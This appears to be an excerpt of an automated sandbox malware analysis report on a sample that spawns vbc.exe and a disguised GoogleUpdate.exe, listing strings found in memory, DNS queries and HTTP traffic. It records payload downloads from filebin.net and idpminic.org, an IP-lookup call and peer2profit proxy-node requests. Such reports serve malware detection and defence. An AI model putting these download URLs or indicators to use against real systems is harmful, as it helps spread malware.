Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponselE
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: vbc.exe, 00000002.00000002.419642930.0000000006F5E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4on
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: vbc.exe, 00000002.00000002.418885129.0000000006F04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.418417866.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419100995.0000000006F16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419158929.0000000006F28000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org
Source: vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/dmi1dfg7n.kjylug
Source: vbc.exe, 00000002.00000002.419100995.0000000006F16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/f429fjd4uf84u.sdfh
Source: vbc.exe, 00000002.00000002.418694358.0000000006EFE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/ofg7d45fsdfgg312.sfhg
Source: vbc.exe, 00000002.00000002.419100995.0000000006F16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org45k
Source: vbc.exe, 00000002.00000002.418885129.0000000006F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.orgD85k
Source: vbc.exe, 00000002.00000002.434598002.0000000007EB7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.408564118.0000000006D0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.410988860.0000000006D99000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.405855785.0000000006C7F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429964631.0000000007D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 6iWK0k820U.exe, 6iWK0k820U.exe, 00000000.00000000.254324630.000000000041C000.00000004.00000001.01000000.00000003.sdmp, 6iWK0k820U.exe, 00000000.00000003.252173765.0000000000522000.00000040.00001000.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: GoogleUpdate.exe, 00000035.00000002.580799994.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/
Source: GoogleUpdate.exe, 00000035.00000002.585478292.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/1
Source: GoogleUpdate.exe, 00000035.00000002.580799994.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/44
Source: GoogleUpdate.exe, 00000035.00000002.585478292.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/My
Source: GoogleUpdate.exe, 00000035.00000003.449376913.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/XF
Source: GoogleUpdate.exe, 00000035.00000003.449376913.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/a
Source: GoogleUpdate.exe, 00000035.00000002.580799994.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/get
Source: GoogleUpdate.exe, 00000035.00000002.580799994.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/get(
Source: GoogleUpdate.exe, 00000035.00000003.451056579.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000035.00000003.449376913.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/get6
Source: GoogleUpdate.exe, 00000035.00000002.585478292.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/get9
Source: GoogleUpdate.exe, 00000035.00000002.580799994.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/getX0
Source: GoogleUpdate.exe, 00000035.00000002.580799994.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/getzVjs
Source: GoogleUpdate.exe, 00000035.00000003.451056579.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/r2profit.com/XF
Source: vbc.exe, 00000002.00000002.434598002.0000000007EB7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.408564118.0000000006D0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.410988860.0000000006D99000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.405855785.0000000006C7F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429964631.0000000007D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: vbc.exe, 00000002.00000002.434598002.0000000007EB7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.408564118.0000000006D0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.410988860.0000000006D99000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.405855785.0000000006C7F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429964631.0000000007D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: vbc.exe, 00000002.00000002.427871632.0000000007C29000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.400435278.0000000006BF3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.394723661.0000000006B62000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429078081.0000000007CA7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434272795.0000000007E9A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.427645718.0000000007C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425239475.0000000007B5B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423608515.0000000007AFA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425702856.0000000007B78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423333203.0000000007ADD000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413447497.0000000006E26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.433443830.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.428804002.0000000007C8A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434598002.0000000007EB7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.408564118.0000000006D0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.410988860.0000000006D99000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.405855785.0000000006C7F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429964631.0000000007D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: vbc.exe, 00000002.00000002.434598002.0000000007EB7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.408564118.0000000006D0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.410988860.0000000006D99000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.405855785.0000000006C7F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429964631.0000000007D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: vbc.exe, 00000002.00000002.419324867.0000000006F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filebin.net
Source: vbc.exe, 00000002.00000002.419324867.0000000006F3B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filebin.net/frdkqyshm4sv9kq0/launcher.exe
Source: vbc.exe, 00000002.00000002.419324867.0000000006F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filebin.net45k
Source: vbc.exe, 00000002.00000002.427871632.0000000007C29000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.400435278.0000000006BF3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.394723661.0000000006B62000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429078081.0000000007CA7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434272795.0000000007E9A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.427645718.0000000007C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425239475.0000000007B5B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423608515.0000000007AFA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425702856.0000000007B78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423333203.0000000007ADD000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413447497.0000000006E26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.433443830.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.428804002.0000000007C8A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434598002.0000000007EB7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.408564118.0000000006D0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.410988860.0000000006D99000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.405855785.0000000006C7F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429964631.0000000007D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: vbc.exe, 00000002.00000002.427871632.0000000007C29000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.400435278.0000000006BF3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.394723661.0000000006B62000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429078081.0000000007CA7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434272795.0000000007E9A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.427645718.0000000007C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425239475.0000000007B5B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423608515.0000000007AFA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425702856.0000000007B78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423333203.0000000007ADD000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413447497.0000000006E26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.433443830.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.428804002.0000000007C8A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434598002.0000000007EB7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.408564118.0000000006D0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.410988860.0000000006D99000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.405855785.0000000006C7F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429964631.0000000007D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: vbc.exe, 00000002.00000002.427871632.0000000007C29000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429078081.0000000007CA7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423608515.0000000007AFA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425702856.0000000007B78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.433443830.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434598002.0000000007EB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: vbc.exe, 00000002.00000002.427871632.0000000007C29000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.400435278.0000000006BF3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.394723661.0000000006B62000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429078081.0000000007CA7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434272795.0000000007E9A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.427645718.0000000007C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425239475.0000000007B5B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423608515.0000000007AFA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425702856.0000000007B78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423333203.0000000007ADD000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413447497.0000000006E26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.433443830.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.428804002.0000000007C8A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434598002.0000000007EB7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.408564118.0000000006D0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.410988860.0000000006D99000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.405855785.0000000006C7F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429964631.0000000007D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: vbc.exe, 00000002.00000002.427871632.0000000007C29000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.400435278.0000000006BF3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.394723661.0000000006B62000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429078081.0000000007CA7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434272795.0000000007E9A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.427645718.0000000007C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425239475.0000000007B5B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423608515.0000000007AFA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425702856.0000000007B78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423333203.0000000007ADD000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413447497.0000000006E26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.433443830.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.428804002.0000000007C8A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434598002.0000000007EB7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.408564118.0000000006D0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.410988860.0000000006D99000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.405855785.0000000006C7F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429964631.0000000007D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: www.idpminic.org

Source: global traffic	HTTP traffic detected: GET /frdkqyshm4sv9kq0/launcher.exe HTTP/1.1Host: filebin.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aula/dmi1dfg7n.kjylug HTTP/1.1Host: www.idpminic.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aula/ofg7d45fsdfgg312.sfhg HTTP/1.1Host: www.idpminic.org
Source: global traffic	HTTP traffic detected: GET /aula/f429fjd4uf84u.sdfh HTTP/1.1Host: www.idpminic.orgConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
